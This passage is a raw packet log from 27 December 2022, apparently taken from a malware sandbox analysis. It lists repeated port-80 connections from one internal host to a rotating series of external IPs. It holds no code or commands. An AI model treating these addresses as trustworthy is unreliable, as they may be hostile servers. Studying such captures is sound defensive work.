                                                                                              Dec 27, 2022 10:54:07.570992947 CET804969535.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:54:07.571017981 CET804969535.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:54:07.571021080 CET4969580192.168.2.435.213.254.232
                                                                                              Dec 27, 2022 10:54:07.571041107 CET804969535.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:54:07.571067095 CET804969535.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:54:07.571073055 CET4969580192.168.2.435.213.254.232
                                                                                              Dec 27, 2022 10:54:07.571090937 CET804969535.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:54:07.571115971 CET804969535.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:54:07.571139097 CET804969535.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:54:07.571140051 CET4969580192.168.2.435.213.254.232
                                                                                              Dec 27, 2022 10:54:07.571162939 CET804969535.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:54:07.571177959 CET4969580192.168.2.435.213.254.232
                                                                                              Dec 27, 2022 10:54:07.571188927 CET804969535.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:54:07.571212053 CET4969580192.168.2.435.213.254.232
                                                                                              Dec 27, 2022 10:54:07.571212053 CET804969535.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:54:07.571235895 CET804969535.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:54:07.571247101 CET4969580192.168.2.435.213.254.232
                                                                                              Dec 27, 2022 10:54:07.571259975 CET804969535.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:54:07.571283102 CET804969535.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:54:07.571296930 CET4969580192.168.2.435.213.254.232
                                                                                              Dec 27, 2022 10:54:07.571306944 CET804969535.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:54:07.571330070 CET804969535.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:54:07.571351051 CET4969580192.168.2.435.213.254.232
                                                                                              Dec 27, 2022 10:54:07.571353912 CET804969535.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:54:07.571377993 CET804969535.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:54:07.571382999 CET4969580192.168.2.435.213.254.232
                                                                                              Dec 27, 2022 10:54:07.571402073 CET804969535.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:54:07.571425915 CET804969535.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:54:07.571432114 CET4969580192.168.2.435.213.254.232
                                                                                              Dec 27, 2022 10:54:07.571449995 CET804969535.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:54:07.571472883 CET804969535.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:54:07.571480036 CET4969580192.168.2.435.213.254.232
                                                                                              Dec 27, 2022 10:54:07.571496964 CET804969535.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:54:07.571520090 CET804969535.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:54:07.571541071 CET804969535.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:54:07.571562052 CET804969535.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:54:07.571578979 CET4969580192.168.2.435.213.254.232
                                                                                              Dec 27, 2022 10:54:07.571600914 CET4969580192.168.2.435.213.254.232
                                                                                              Dec 27, 2022 10:54:07.571676016 CET4969580192.168.2.435.213.254.232
                                                                                              Dec 27, 2022 10:54:07.572202921 CET4969580192.168.2.435.213.254.232
                                                                                              Dec 27, 2022 10:54:07.839188099 CET804969535.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:54:08.488051891 CET49678443192.168.2.420.190.159.1
                                                                                              Dec 27, 2022 10:54:08.628634930 CET49679443192.168.2.420.190.159.1
                                                                                              Dec 27, 2022 10:54:08.629591942 CET49680443192.168.2.420.190.159.1
                                                                                              Dec 27, 2022 10:54:12.413888931 CET49685443192.168.2.4204.79.197.200
                                                                                              Dec 27, 2022 10:54:12.488179922 CET49684443192.168.2.4204.79.197.200
                                                                                              Dec 27, 2022 10:54:12.488224983 CET49687443192.168.2.4204.79.197.200
                                                                                              Dec 27, 2022 10:54:17.764810085 CET4969680192.168.2.4194.58.112.174
                                                                                              Dec 27, 2022 10:54:17.827502966 CET8049696194.58.112.174192.168.2.4
                                                                                              Dec 27, 2022 10:54:17.827598095 CET4969680192.168.2.4194.58.112.174
                                                                                              Dec 27, 2022 10:54:17.827792883 CET4969680192.168.2.4194.58.112.174
                                                                                              Dec 27, 2022 10:54:17.890100002 CET8049696194.58.112.174192.168.2.4
                                                                                              Dec 27, 2022 10:54:17.890141010 CET8049696194.58.112.174192.168.2.4
                                                                                              Dec 27, 2022 10:54:17.890163898 CET8049696194.58.112.174192.168.2.4
                                                                                              Dec 27, 2022 10:54:17.890260935 CET4969680192.168.2.4194.58.112.174
                                                                                              Dec 27, 2022 10:54:19.332849026 CET4969680192.168.2.4194.58.112.174
                                                                                              Dec 27, 2022 10:54:20.349060059 CET4969780192.168.2.4194.58.112.174
                                                                                              Dec 27, 2022 10:54:20.410742044 CET8049697194.58.112.174192.168.2.4
                                                                                              Dec 27, 2022 10:54:20.410975933 CET4969780192.168.2.4194.58.112.174
                                                                                              Dec 27, 2022 10:54:20.411514997 CET4969780192.168.2.4194.58.112.174
                                                                                              Dec 27, 2022 10:54:20.472774029 CET8049697194.58.112.174192.168.2.4
                                                                                              Dec 27, 2022 10:54:20.472800016 CET8049697194.58.112.174192.168.2.4
                                                                                              Dec 27, 2022 10:54:20.472820044 CET8049697194.58.112.174192.168.2.4
                                                                                              Dec 27, 2022 10:54:20.473104954 CET4969780192.168.2.4194.58.112.174
                                                                                              Dec 27, 2022 10:54:20.473433971 CET4969780192.168.2.4194.58.112.174
                                                                                              Dec 27, 2022 10:54:20.534540892 CET8049697194.58.112.174192.168.2.4
                                                                                              Dec 27, 2022 10:54:25.609018087 CET4969880192.168.2.435.77.200.33
                                                                                              Dec 27, 2022 10:54:25.863369942 CET804969835.77.200.33192.168.2.4
                                                                                              Dec 27, 2022 10:54:25.863459110 CET4969880192.168.2.435.77.200.33
                                                                                              Dec 27, 2022 10:54:25.863703012 CET4969880192.168.2.435.77.200.33
                                                                                              Dec 27, 2022 10:54:26.117456913 CET804969835.77.200.33192.168.2.4
                                                                                              Dec 27, 2022 10:54:26.117521048 CET804969835.77.200.33192.168.2.4
                                                                                              Dec 27, 2022 10:54:26.117559910 CET804969835.77.200.33192.168.2.4
                                                                                              Dec 27, 2022 10:54:26.134557009 CET4969880192.168.2.435.77.200.33
                                                                                              Dec 27, 2022 10:54:27.371511936 CET4969880192.168.2.435.77.200.33
                                                                                              Dec 27, 2022 10:54:28.386723042 CET4969980192.168.2.435.77.200.33
                                                                                              Dec 27, 2022 10:54:28.644985914 CET804969935.77.200.33192.168.2.4
                                                                                              Dec 27, 2022 10:54:28.733957052 CET4969980192.168.2.435.77.200.33
                                                                                              Dec 27, 2022 10:54:29.333051920 CET4969980192.168.2.435.77.200.33
                                                                                              Dec 27, 2022 10:54:29.591403961 CET804969935.77.200.33192.168.2.4
                                                                                              Dec 27, 2022 10:54:29.591451883 CET804969935.77.200.33192.168.2.4
                                                                                              Dec 27, 2022 10:54:29.591479063 CET804969935.77.200.33192.168.2.4
                                                                                              Dec 27, 2022 10:54:29.608110905 CET4969980192.168.2.435.77.200.33
                                                                                              Dec 27, 2022 10:54:29.608195066 CET4969980192.168.2.435.77.200.33
                                                                                              Dec 27, 2022 10:54:29.866399050 CET804969935.77.200.33192.168.2.4
                                                                                              Dec 27, 2022 10:54:31.186089993 CET44349690204.79.197.200192.168.2.4
                                                                                              Dec 27, 2022 10:54:34.657232046 CET4970080192.168.2.4162.254.33.214
                                                                                              Dec 27, 2022 10:54:34.833739042 CET8049700162.254.33.214192.168.2.4
                                                                                              Dec 27, 2022 10:54:34.833928108 CET4970080192.168.2.4162.254.33.214
                                                                                              Dec 27, 2022 10:54:34.834264994 CET4970080192.168.2.4162.254.33.214
                                                                                              Dec 27, 2022 10:54:35.010159969 CET8049700162.254.33.214192.168.2.4
                                                                                              Dec 27, 2022 10:54:35.090717077 CET8049700162.254.33.214192.168.2.4
                                                                                              Dec 27, 2022 10:54:35.090801001 CET8049700162.254.33.214192.168.2.4
                                                                                              Dec 27, 2022 10:54:35.091054916 CET4970080192.168.2.4162.254.33.214
                                                                                              Dec 27, 2022 10:54:36.346653938 CET4970080192.168.2.4162.254.33.214
                                                                                              Dec 27, 2022 10:54:37.363830090 CET4970180192.168.2.4162.254.33.214
                                                                                              Dec 27, 2022 10:54:37.541506052 CET8049701162.254.33.214192.168.2.4
                                                                                              Dec 27, 2022 10:54:37.541656971 CET4970180192.168.2.4162.254.33.214
                                                                                              Dec 27, 2022 10:54:37.541791916 CET4970180192.168.2.4162.254.33.214
                                                                                              Dec 27, 2022 10:54:37.718560934 CET8049701162.254.33.214192.168.2.4
                                                                                              Dec 27, 2022 10:54:37.825251102 CET8049701162.254.33.214192.168.2.4
                                                                                              Dec 27, 2022 10:54:37.825316906 CET8049701162.254.33.214192.168.2.4
                                                                                              Dec 27, 2022 10:54:37.825490952 CET4970180192.168.2.4162.254.33.214
                                                                                              Dec 27, 2022 10:54:37.825638056 CET4970180192.168.2.4162.254.33.214
                                                                                              Dec 27, 2022 10:54:38.005819082 CET8049701162.254.33.214192.168.2.4
                                                                                              Dec 27, 2022 10:54:43.054706097 CET4970280192.168.2.464.225.91.73
                                                                                              Dec 27, 2022 10:54:43.221705914 CET804970264.225.91.73192.168.2.4
                                                                                              Dec 27, 2022 10:54:43.221827030 CET4970280192.168.2.464.225.91.73
                                                                                              Dec 27, 2022 10:54:43.222023010 CET4970280192.168.2.464.225.91.73
                                                                                              Dec 27, 2022 10:54:43.389769077 CET804970264.225.91.73192.168.2.4
                                                                                              Dec 27, 2022 10:54:43.391475916 CET804970264.225.91.73192.168.2.4
                                                                                              Dec 27, 2022 10:54:43.391510963 CET804970264.225.91.73192.168.2.4
                                                                                              Dec 27, 2022 10:54:43.391599894 CET4970280192.168.2.464.225.91.73
                                                                                              Dec 27, 2022 10:54:44.737932920 CET4970280192.168.2.464.225.91.73
                                                                                              Dec 27, 2022 10:54:45.754336119 CET4970380192.168.2.464.225.91.73
                                                                                              Dec 27, 2022 10:54:45.922820091 CET804970364.225.91.73192.168.2.4
                                                                                              Dec 27, 2022 10:54:45.923033953 CET4970380192.168.2.464.225.91.73
                                                                                              Dec 27, 2022 10:54:45.923196077 CET4970380192.168.2.464.225.91.73
                                                                                              Dec 27, 2022 10:54:46.091626883 CET804970364.225.91.73192.168.2.4
                                                                                              Dec 27, 2022 10:54:46.092865944 CET804970364.225.91.73192.168.2.4
                                                                                              Dec 27, 2022 10:54:46.092909098 CET804970364.225.91.73192.168.2.4
                                                                                              Dec 27, 2022 10:54:46.093220949 CET4970380192.168.2.464.225.91.73
                                                                                              Dec 27, 2022 10:54:46.093337059 CET4970380192.168.2.464.225.91.73
                                                                                              Dec 27, 2022 10:54:46.566092968 CET4970380192.168.2.464.225.91.73
                                                                                              Dec 27, 2022 10:54:46.734744072 CET804970364.225.91.73192.168.2.4
                                                                                              Dec 27, 2022 10:54:51.274924040 CET4970480192.168.2.4107.149.40.247
                                                                                              Dec 27, 2022 10:54:51.448204994 CET8049704107.149.40.247192.168.2.4
                                                                                              Dec 27, 2022 10:54:51.448504925 CET4970480192.168.2.4107.149.40.247
                                                                                              Dec 27, 2022 10:54:51.448692083 CET4970480192.168.2.4107.149.40.247
                                                                                              Dec 27, 2022 10:54:51.620189905 CET8049704107.149.40.247192.168.2.4
                                                                                              Dec 27, 2022 10:54:51.646505117 CET8049704107.149.40.247192.168.2.4
                                                                                              Dec 27, 2022 10:54:51.646538019 CET8049704107.149.40.247192.168.2.4
                                                                                              Dec 27, 2022 10:54:51.646634102 CET4970480192.168.2.4107.149.40.247
                                                                                              Dec 27, 2022 10:54:52.957447052 CET4970480192.168.2.4107.149.40.247
                                                                                              Dec 27, 2022 10:54:53.974349022 CET4970580192.168.2.4107.149.40.247
                                                                                              Dec 27, 2022 10:54:54.147638083 CET8049705107.149.40.247192.168.2.4
                                                                                              Dec 27, 2022 10:54:54.148135900 CET4970580192.168.2.4107.149.40.247
                                                                                              Dec 27, 2022 10:54:54.148135900 CET4970580192.168.2.4107.149.40.247
                                                                                              Dec 27, 2022 10:54:54.321335077 CET8049705107.149.40.247192.168.2.4
                                                                                              Dec 27, 2022 10:54:54.323177099 CET8049705107.149.40.247192.168.2.4
                                                                                              Dec 27, 2022 10:54:54.323219061 CET8049705107.149.40.247192.168.2.4
                                                                                              Dec 27, 2022 10:54:54.324717045 CET4970580192.168.2.4107.149.40.247
                                                                                              Dec 27, 2022 10:54:54.324717045 CET4970580192.168.2.4107.149.40.247
                                                                                              Dec 27, 2022 10:54:54.498125076 CET8049705107.149.40.247192.168.2.4
                                                                                              Dec 27, 2022 10:54:59.396485090 CET4970680192.168.2.4176.28.33.25
                                                                                              Dec 27, 2022 10:54:59.416946888 CET8049706176.28.33.25192.168.2.4
                                                                                              Dec 27, 2022 10:54:59.417131901 CET4970680192.168.2.4176.28.33.25
                                                                                              Dec 27, 2022 10:54:59.417362928 CET4970680192.168.2.4176.28.33.25
                                                                                              Dec 27, 2022 10:54:59.437551975 CET8049706176.28.33.25192.168.2.4
                                                                                              Dec 27, 2022 10:54:59.441658020 CET8049706176.28.33.25192.168.2.4
                                                                                              Dec 27, 2022 10:54:59.441714048 CET8049706176.28.33.25192.168.2.4
                                                                                              Dec 27, 2022 10:54:59.441752911 CET8049706176.28.33.25192.168.2.4
                                                                                              Dec 27, 2022 10:54:59.441894054 CET4970680192.168.2.4176.28.33.25
                                                                                              Dec 27, 2022 10:55:00.927040100 CET4970680192.168.2.4176.28.33.25
                                                                                              Dec 27, 2022 10:55:01.943073034 CET4970780192.168.2.4176.28.33.25
                                                                                              Dec 27, 2022 10:55:01.965542078 CET8049707176.28.33.25192.168.2.4
                                                                                              Dec 27, 2022 10:55:01.965765953 CET4970780192.168.2.4176.28.33.25
                                                                                              Dec 27, 2022 10:55:01.965841055 CET4970780192.168.2.4176.28.33.25
                                                                                              Dec 27, 2022 10:55:01.987912893 CET8049707176.28.33.25192.168.2.4
                                                                                              Dec 27, 2022 10:55:01.991780996 CET8049707176.28.33.25192.168.2.4
                                                                                              Dec 27, 2022 10:55:01.991805077 CET8049707176.28.33.25192.168.2.4
                                                                                              Dec 27, 2022 10:55:01.991821051 CET8049707176.28.33.25192.168.2.4
                                                                                              Dec 27, 2022 10:55:01.992100954 CET4970780192.168.2.4176.28.33.25
                                                                                              Dec 27, 2022 10:55:01.992796898 CET4970780192.168.2.4176.28.33.25
                                                                                              Dec 27, 2022 10:55:02.015477896 CET8049707176.28.33.25192.168.2.4
                                                                                              Dec 27, 2022 10:55:07.229034901 CET4970880192.168.2.4146.148.102.201
                                                                                              Dec 27, 2022 10:55:07.397248030 CET8049708146.148.102.201192.168.2.4
                                                                                              Dec 27, 2022 10:55:07.397416115 CET4970880192.168.2.4146.148.102.201
                                                                                              Dec 27, 2022 10:55:07.397564888 CET4970880192.168.2.4146.148.102.201
                                                                                              Dec 27, 2022 10:55:07.565212965 CET8049708146.148.102.201192.168.2.4
                                                                                              Dec 27, 2022 10:55:07.566565990 CET8049708146.148.102.201192.168.2.4
                                                                                              Dec 27, 2022 10:55:07.566603899 CET8049708146.148.102.201192.168.2.4
                                                                                              Dec 27, 2022 10:55:07.566760063 CET4970880192.168.2.4146.148.102.201
                                                                                              Dec 27, 2022 10:55:08.915266037 CET4970880192.168.2.4146.148.102.201
                                                                                              Dec 27, 2022 10:55:09.928002119 CET4970980192.168.2.4146.148.102.201
                                                                                              Dec 27, 2022 10:55:10.095761061 CET8049709146.148.102.201192.168.2.4
                                                                                              Dec 27, 2022 10:55:10.096236944 CET4970980192.168.2.4146.148.102.201
                                                                                              Dec 27, 2022 10:55:10.096352100 CET4970980192.168.2.4146.148.102.201
                                                                                              Dec 27, 2022 10:55:10.263767958 CET8049709146.148.102.201192.168.2.4
                                                                                              Dec 27, 2022 10:55:10.301558971 CET8049709146.148.102.201192.168.2.4
                                                                                              Dec 27, 2022 10:55:10.301601887 CET8049709146.148.102.201192.168.2.4
                                                                                              Dec 27, 2022 10:55:10.301820040 CET4970980192.168.2.4146.148.102.201
                                                                                              Dec 27, 2022 10:55:10.302023888 CET4970980192.168.2.4146.148.102.201
                                                                                              Dec 27, 2022 10:55:10.469254017 CET8049709146.148.102.201192.168.2.4
                                                                                              Dec 27, 2022 10:55:15.471779108 CET4971080192.168.2.4166.88.175.130
                                                                                              Dec 27, 2022 10:55:15.638427973 CET8049710166.88.175.130192.168.2.4
                                                                                              Dec 27, 2022 10:55:15.638736010 CET4971080192.168.2.4166.88.175.130
                                                                                              Dec 27, 2022 10:55:15.639133930 CET4971080192.168.2.4166.88.175.130
                                                                                              Dec 27, 2022 10:55:15.805495024 CET8049710166.88.175.130192.168.2.4
                                                                                              Dec 27, 2022 10:55:15.847455978 CET8049710166.88.175.130192.168.2.4
                                                                                              Dec 27, 2022 10:55:15.847498894 CET8049710166.88.175.130192.168.2.4
                                                                                              Dec 27, 2022 10:55:15.847523928 CET8049710166.88.175.130192.168.2.4
                                                                                              Dec 27, 2022 10:55:15.847600937 CET4971080192.168.2.4166.88.175.130
                                                                                              Dec 27, 2022 10:55:17.146975994 CET4971080192.168.2.4166.88.175.130
                                                                                              Dec 27, 2022 10:55:18.163623095 CET4971180192.168.2.4166.88.175.130
                                                                                              Dec 27, 2022 10:55:18.332847118 CET8049711166.88.175.130192.168.2.4
                                                                                              Dec 27, 2022 10:55:18.333158016 CET4971180192.168.2.4166.88.175.130
                                                                                              Dec 27, 2022 10:55:18.333301067 CET4971180192.168.2.4166.88.175.130
                                                                                              Dec 27, 2022 10:55:18.502707005 CET8049711166.88.175.130192.168.2.4
                                                                                              Dec 27, 2022 10:55:18.546303034 CET8049711166.88.175.130192.168.2.4
                                                                                              Dec 27, 2022 10:55:18.546360016 CET8049711166.88.175.130192.168.2.4
                                                                                              Dec 27, 2022 10:55:18.546401024 CET8049711166.88.175.130192.168.2.4
                                                                                              Dec 27, 2022 10:55:18.546433926 CET8049711166.88.175.130192.168.2.4
                                                                                              Dec 27, 2022 10:55:18.546464920 CET8049711166.88.175.130192.168.2.4
                                                                                              Dec 27, 2022 10:55:18.546504021 CET8049711166.88.175.130192.168.2.4
                                                                                              Dec 27, 2022 10:55:18.546583891 CET4971180192.168.2.4166.88.175.130
                                                                                              Dec 27, 2022 10:55:18.546716928 CET4971180192.168.2.4166.88.175.130
                                                                                              Dec 27, 2022 10:55:18.547658920 CET4971180192.168.2.4166.88.175.130
                                                                                              Dec 27, 2022 10:55:18.716701031 CET8049711166.88.175.130192.168.2.4
                                                                                              Dec 27, 2022 10:55:23.888643026 CET4971280192.168.2.4185.224.170.82
                                                                                              Dec 27, 2022 10:55:24.103301048 CET8049712185.224.170.82192.168.2.4
                                                                                              Dec 27, 2022 10:55:24.103498936 CET4971280192.168.2.4185.224.170.82
                                                                                              Dec 27, 2022 10:55:24.103687048 CET4971280192.168.2.4185.224.170.82
                                                                                              Dec 27, 2022 10:55:24.318248987 CET8049712185.224.170.82192.168.2.4
                                                                                              Dec 27, 2022 10:55:24.318321943 CET8049712185.224.170.82192.168.2.4
                                                                                              Dec 27, 2022 10:55:24.318341017 CET8049712185.224.170.82192.168.2.4
                                                                                              Dec 27, 2022 10:55:24.318505049 CET4971280192.168.2.4185.224.170.82
                                                                                              Dec 27, 2022 10:55:25.616513968 CET4971280192.168.2.4185.224.170.82
                                                                                              Dec 27, 2022 10:55:26.632760048 CET4971380192.168.2.4185.224.170.82
                                                                                              Dec 27, 2022 10:55:26.849741936 CET8049713185.224.170.82192.168.2.4
                                                                                              Dec 27, 2022 10:55:26.849980116 CET4971380192.168.2.4185.224.170.82
                                                                                              Dec 27, 2022 10:55:26.850188017 CET4971380192.168.2.4185.224.170.82
                                                                                              Dec 27, 2022 10:55:27.067075014 CET8049713185.224.170.82192.168.2.4
                                                                                              Dec 27, 2022 10:55:27.067117929 CET8049713185.224.170.82192.168.2.4
                                                                                              Dec 27, 2022 10:55:27.067141056 CET8049713185.224.170.82192.168.2.4
                                                                                              Dec 27, 2022 10:55:27.067342043 CET4971380192.168.2.4185.224.170.82
                                                                                              Dec 27, 2022 10:55:27.067636967 CET4971380192.168.2.4185.224.170.82
                                                                                              Dec 27, 2022 10:55:27.284003019 CET8049713185.224.170.82192.168.2.4
                                                                                              Dec 27, 2022 10:55:32.237154961 CET4971480192.168.2.4185.253.34.81
                                                                                              Dec 27, 2022 10:55:32.261831045 CET8049714185.253.34.81192.168.2.4
                                                                                              Dec 27, 2022 10:55:32.263345957 CET4971480192.168.2.4185.253.34.81
                                                                                              Dec 27, 2022 10:55:32.263557911 CET4971480192.168.2.4185.253.34.81
                                                                                              Dec 27, 2022 10:55:32.288028955 CET8049714185.253.34.81192.168.2.4
                                                                                              Dec 27, 2022 10:55:32.343802929 CET8049714185.253.34.81192.168.2.4
                                                                                              Dec 27, 2022 10:55:32.343873978 CET8049714185.253.34.81192.168.2.4
                                                                                              Dec 27, 2022 10:55:32.344002008 CET4971480192.168.2.4185.253.34.81
                                                                                              Dec 27, 2022 10:55:33.773322105 CET4971480192.168.2.4185.253.34.81
                                                                                              Dec 27, 2022 10:55:34.790026903 CET4971580192.168.2.4185.253.34.81
                                                                                              Dec 27, 2022 10:55:34.814819098 CET8049715185.253.34.81192.168.2.4
                                                                                              Dec 27, 2022 10:55:34.815105915 CET4971580192.168.2.4185.253.34.81
                                                                                              Dec 27, 2022 10:55:34.815105915 CET4971580192.168.2.4185.253.34.81
                                                                                              Dec 27, 2022 10:55:34.839781046 CET8049715185.253.34.81192.168.2.4
                                                                                              Dec 27, 2022 10:55:36.612095118 CET8049715185.253.34.81192.168.2.4
                                                                                              Dec 27, 2022 10:55:36.612129927 CET8049715185.253.34.81192.168.2.4
                                                                                              Dec 27, 2022 10:55:36.612440109 CET4971580192.168.2.4185.253.34.81
                                                                                              Dec 27, 2022 10:55:36.612622023 CET8049715185.253.34.81192.168.2.4
                                                                                              Dec 27, 2022 10:55:36.612776995 CET4971580192.168.2.4185.253.34.81
                                                                                              Dec 27, 2022 10:55:36.612968922 CET4971580192.168.2.4185.253.34.81
                                                                                              Dec 27, 2022 10:55:36.637085915 CET8049715185.253.34.81192.168.2.4
                                                                                              Dec 27, 2022 10:55:41.986258030 CET4971680192.168.2.464.64.253.213
                                                                                              Dec 27, 2022 10:55:42.162662029 CET804971664.64.253.213192.168.2.4
                                                                                              Dec 27, 2022 10:55:42.162841082 CET4971680192.168.2.464.64.253.213
                                                                                              Dec 27, 2022 10:55:42.338711977 CET804971664.64.253.213192.168.2.4
                                                                                              Dec 27, 2022 10:55:42.338970900 CET4971680192.168.2.464.64.253.213
                                                                                              Dec 27, 2022 10:55:42.514523029 CET804971664.64.253.213192.168.2.4
                                                                                              Dec 27, 2022 10:55:44.680979013 CET4971780192.168.2.464.64.253.213
                                                                                              Dec 27, 2022 10:55:44.850444078 CET804971764.64.253.213192.168.2.4
                                                                                              Dec 27, 2022 10:55:44.850742102 CET4971780192.168.2.464.64.253.213
                                                                                              Dec 27, 2022 10:55:45.015578032 CET804971764.64.253.213192.168.2.4
                                                                                              Dec 27, 2022 10:55:45.015793085 CET4971780192.168.2.464.64.253.213
                                                                                              Dec 27, 2022 10:55:45.180377007 CET804971764.64.253.213192.168.2.4
                                                                                              Dec 27, 2022 10:55:50.102832079 CET4971880192.168.2.4192.46.208.151
                                                                                              Dec 27, 2022 10:55:50.263202906 CET8049718192.46.208.151192.168.2.4
                                                                                              Dec 27, 2022 10:55:50.263329029 CET4971880192.168.2.4192.46.208.151
                                                                                              Dec 27, 2022 10:55:50.263499022 CET4971880192.168.2.4192.46.208.151
                                                                                              Dec 27, 2022 10:55:50.423511982 CET8049718192.46.208.151192.168.2.4
                                                                                              Dec 27, 2022 10:55:50.455045938 CET8049718192.46.208.151192.168.2.4
                                                                                              Dec 27, 2022 10:55:50.455116987 CET8049718192.46.208.151192.168.2.4
                                                                                              Dec 27, 2022 10:55:50.455159903 CET8049718192.46.208.151192.168.2.4
                                                                                              Dec 27, 2022 10:55:50.455284119 CET4971880192.168.2.4192.46.208.151
                                                                                              Dec 27, 2022 10:55:50.456830978 CET8049718192.46.208.151192.168.2.4
                                                                                              Dec 27, 2022 10:55:50.456943989 CET4971880192.168.2.4192.46.208.151
                                                                                              Dec 27, 2022 10:55:51.774823904 CET4971880192.168.2.4192.46.208.151
                                                                                              Dec 27, 2022 10:55:52.791090012 CET4971980192.168.2.4192.46.208.151
                                                                                              Dec 27, 2022 10:55:52.963468075 CET8049719192.46.208.151192.168.2.4
                                                                                              Dec 27, 2022 10:55:52.963624954 CET4971980192.168.2.4192.46.208.151
                                                                                              Dec 27, 2022 10:55:52.964817047 CET4971980192.168.2.4192.46.208.151
                                                                                              Dec 27, 2022 10:55:53.136955976 CET8049719192.46.208.151192.168.2.4
                                                                                              Dec 27, 2022 10:55:53.418457031 CET8049719192.46.208.151192.168.2.4
                                                                                              Dec 27, 2022 10:55:53.418507099 CET8049719192.46.208.151192.168.2.4
                                                                                              Dec 27, 2022 10:55:53.418538094 CET8049719192.46.208.151192.168.2.4
                                                                                              Dec 27, 2022 10:55:53.418565989 CET8049719192.46.208.151192.168.2.4
                                                                                              Dec 27, 2022 10:55:53.418596029 CET8049719192.46.208.151192.168.2.4
                                                                                              Dec 27, 2022 10:55:53.418627024 CET8049719192.46.208.151192.168.2.4
                                                                                              Dec 27, 2022 10:55:53.418683052 CET4971980192.168.2.4192.46.208.151
                                                                                              Dec 27, 2022 10:55:53.418801069 CET4971980192.168.2.4192.46.208.151
                                                                                              Dec 27, 2022 10:55:53.422030926 CET8049719192.46.208.151192.168.2.4
                                                                                              Dec 27, 2022 10:55:53.422164917 CET4971980192.168.2.4192.46.208.151
                                                                                              Dec 27, 2022 10:55:53.422230005 CET4971980192.168.2.4192.46.208.151
                                                                                              Dec 27, 2022 10:55:53.594140053 CET8049719192.46.208.151192.168.2.4
                                                                                              Dec 27, 2022 10:55:58.569607019 CET4972080192.168.2.4141.8.195.124
                                                                                              Dec 27, 2022 10:55:58.625809908 CET8049720141.8.195.124192.168.2.4
                                                                                              Dec 27, 2022 10:55:58.626185894 CET4972080192.168.2.4141.8.195.124
                                                                                              Dec 27, 2022 10:55:58.626185894 CET4972080192.168.2.4141.8.195.124
                                                                                              Dec 27, 2022 10:55:58.682622910 CET8049720141.8.195.124192.168.2.4
                                                                                              Dec 27, 2022 10:55:58.683485031 CET8049720141.8.195.124192.168.2.4
                                                                                              Dec 27, 2022 10:55:58.683506966 CET8049720141.8.195.124192.168.2.4
                                                                                              Dec 27, 2022 10:55:58.683571100 CET4972080192.168.2.4141.8.195.124
                                                                                              Dec 27, 2022 10:56:00.135021925 CET4972080192.168.2.4141.8.195.124
                                                                                              Dec 27, 2022 10:56:01.151346922 CET4972180192.168.2.4141.8.195.124
                                                                                              Dec 27, 2022 10:56:01.215075970 CET8049721141.8.195.124192.168.2.4
                                                                                              Dec 27, 2022 10:56:01.215274096 CET4972180192.168.2.4141.8.195.124
                                                                                              Dec 27, 2022 10:56:01.215430021 CET4972180192.168.2.4141.8.195.124
                                                                                              Dec 27, 2022 10:56:01.278772116 CET8049721141.8.195.124192.168.2.4
                                                                                              Dec 27, 2022 10:56:01.280149937 CET8049721141.8.195.124192.168.2.4
                                                                                              Dec 27, 2022 10:56:01.280179977 CET8049721141.8.195.124192.168.2.4
                                                                                              Dec 27, 2022 10:56:01.280421019 CET4972180192.168.2.4141.8.195.124
                                                                                              Dec 27, 2022 10:56:01.280580997 CET4972180192.168.2.4141.8.195.124
                                                                                              Dec 27, 2022 10:56:01.344094992 CET8049721141.8.195.124192.168.2.4
                                                                                              Dec 27, 2022 10:56:17.519154072 CET4972480192.168.2.488.99.217.197
                                                                                              Dec 27, 2022 10:56:17.543422937 CET804972488.99.217.197192.168.2.4
                                                                                              Dec 27, 2022 10:56:17.543636084 CET4972480192.168.2.488.99.217.197
                                                                                              Dec 27, 2022 10:56:17.544130087 CET4972480192.168.2.488.99.217.197
                                                                                              Dec 27, 2022 10:56:17.568242073 CET804972488.99.217.197192.168.2.4
                                                                                              Dec 27, 2022 10:56:17.571763992 CET804972488.99.217.197192.168.2.4
                                                                                              Dec 27, 2022 10:56:17.571815014 CET804972488.99.217.197192.168.2.4
                                                                                              Dec 27, 2022 10:56:17.572124958 CET4972480192.168.2.488.99.217.197
                                                                                              Dec 27, 2022 10:56:19.066376925 CET4972480192.168.2.488.99.217.197
                                                                                              Dec 27, 2022 10:56:20.074759960 CET4972580192.168.2.488.99.217.197
                                                                                              Dec 27, 2022 10:56:20.098831892 CET804972588.99.217.197192.168.2.4
                                                                                              Dec 27, 2022 10:56:20.098958015 CET4972580192.168.2.488.99.217.197
                                                                                              Dec 27, 2022 10:56:20.099251986 CET4972580192.168.2.488.99.217.197
                                                                                              Dec 27, 2022 10:56:20.123050928 CET804972588.99.217.197192.168.2.4
                                                                                              Dec 27, 2022 10:56:20.126142979 CET804972588.99.217.197192.168.2.4
                                                                                              Dec 27, 2022 10:56:20.126229048 CET804972588.99.217.197192.168.2.4
                                                                                              Dec 27, 2022 10:56:20.126419067 CET4972580192.168.2.488.99.217.197
                                                                                              Dec 27, 2022 10:56:20.126849890 CET4972580192.168.2.488.99.217.197
                                                                                              Dec 27, 2022 10:56:20.150608063 CET804972588.99.217.197192.168.2.4
